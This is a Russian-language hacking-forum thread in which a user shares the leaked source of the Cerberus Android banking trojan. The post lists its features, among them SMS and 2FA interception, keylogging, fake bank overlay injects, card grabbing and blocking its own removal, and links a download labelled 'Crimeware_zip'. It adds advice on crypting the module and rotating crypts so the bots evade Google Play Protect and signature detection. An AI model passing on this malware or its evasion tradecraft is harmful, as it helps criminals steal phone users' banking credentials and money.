Сerberus Source Code (исходники приват АНДРОИД БОТ)

Discussion in 'Javascript' started by Dovakin, 25 Aug 2020.

  1. Dovakin

    Dovakin New Member

    Joined:
    2 Apr 2020
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    Возможности бота:
    Отправка СМС
    2FA grabber
    Перехват СМС
    Cкрытый перехват СМС
    Блокировка девайса
    Отключение звука
    Кейлоггер(месседжеры, ватц апп, телеграмм-сикрет, банки и т.д., кроме браузеров!)
    Выполнение USSD команд
    Переадресация вызова
    Открытие фейк-страницы банка
    Запуск любого установленного приложения
    Пуш уведомление банка(Автоматический пуш - определяет какой установленный банк)
    Открыть url в браузере
    Получить все установленные приложения
    Получить все контакты их телефонной книги
    Получить все сохраненные СМС
    Удаление любого приложения
    Самоуничтожение бота
    Автоматическое подтверждения прав и разрешений
    Бот может иметь несколько запасных url для соединения с сервером
    Инжекты(html+js+css, качаются на девайс и запускаются с диска, плохое соединение или отсутсвие интернета не повлияет на работу инжектов)
    Граббер карт
    Граббер почт
    Автоматическое включения инжектов через время указанное в админ панели
    Автоматическое отключения Google Play Protect + отключения через время указанное в админ панели
    Антиэмулятор(Бот начинает работать после проявления активности девайса)
    Свойства бота:
    Модульность
    Размер приложения бота от 125 до 180 КБ(Крипт около 1 МБ)
    Работает на версиях Android 5 и выше
    Скрытый перехват SMS работает от 5 версии и выше
    Инжекты работают на всех актуальных версиях Android 5 - 10+
    Данные между сервером и ботом шифруются по алгоритму RC4 + base64 с рандомным ключом
    Блокировка удаления бота
    Блокировка отключения админ прав
    Блокировка отключения Accessibility Service
    Может иметь несколько запасных доменов для отстука
    Мультиязычность
    Бот передает данные на сервер где они же отображаются в панели администрирования:
    Уникальный идентификатор бота
    Версия Android
    Маркировка билда
    Страна + язык который установлен в настройках девайсе
    Последний отстук
    Состояние экрана(on/off)
    Состояние Google Play Protect
    Состояние Accessibility Service
    Состояние Прав Администратора
    Состояние получения основного модуля
    Состояние скрытого перехвата СМС
    Наличие логов банка, карт и почт!
    Лист установленных банков
    IP девайса
    Дата заражений девайса
    Модель девайса
    Оператор
    Состояние заряда батареи
    Сотовый номер холдера
    Активность телефона(Определяем наличии эмулятора)
    Время работы бота!
    Особенности панели администрирования:
    Живая панель администрирования
    Общие и индивидуальные задания
    Фильтрация таблицы ботов
    Добавление своих инжектов с помощью удобного интерфейса
    Загрузка инжектов в HTML формате
    Статистика: Online, Offline, Logs
    Хранение в базе данных списков приложений и телефонных контактов
    Раздельные логи банков, карт и почт
    Панель находится в сети TOR на наших серверах
    Билдер
    https://anonfiles.com/D1L4k0O9o1/Crimeware_zip
    https://www.virustotal.com/gui/url/...934218fa0f9c9607cdee7c2320f0ad8501a/detection
    Гугл обнову выпустил, плей протект не отлючается. Но допилить можно эти сорцы, заработают.

    Google Play Protect если даже в Маркете отключаешь, он раз в сутки все равно "тихо" сканирует и отправляет результаты в Google. То, что его боты некоторые отключают Google Play Protect , это лишнее палево и все. Проще делать хороший крипт и постоянно менять крипт, желательно, чтобы один крипт шел на 3-5 ботов максимум и вообще не трогать Google Play Protect. Тогда и боты будут жить дольше

    Кодер после того как слил сорцы:
    У нас бот умер из за одной проблемы, плей протект стал сканировать ресурсы у АПК файла.
    Изначально церберус разрабатывался как модульный бот, с подгрузкой вредоностного кода в ресурсы, и на тот момент плей протект не умел сканировать ресурсы приложения.
    На текущий момент на нашем модуле стоят сигнатуры, и боты "умирают" при его загрузке. Решение - убрать модуль из кода, и криптовать весь АПК, но тогда размер АПК будет очень большой.
    Решение номер два: криптовать модуль.

    Почему мы не стали это делать?
    У нас был один модуль для всех клиентов, и так как команда распалась, не получилось найти новых программистов, которые бы сделали индивидуально под каждого клиента свой модуль.
    В итоге у нас клиенты не могли криптовать модуль под себя. Мы криптовали модуль 5 раз, и каждый крипт палился на следующий день по сигнатурам, и в итоге руки опустились, так как это не решение проблемы.

    Что нужно сделать,-переписать например модульную структуру.Поддержку SDK 30 (Android 11). Частично переписать админ панель (для реализации модулей под каждого клиента) в целом комплекс хорошо устроен,но требует много дороботок . Крипт модулей спасёт.(от сигнатурного детекта)
     
    #1 Dovakin, 25 Aug 2020
    Last edited: 4 Sep 2020
  2. PEPSICOLA

    PEPSICOLA . . . . . 2L . . . . .

    Joined:
    14 Oct 2004
    Messages:
    1,027
    Likes Received:
    809
    Reputations:
    368
    Да ладно, этот тот самый cerberusapp? Они пидоры на самом деле, я покупал у них лицензию вечную, а спустя лет 5 они сбросили эти лицензии, сделали их на год и после вовсе отключили. Если это речь о них.

    Но там доступ к упавлению ботом через web.
     
    Dovakin likes this.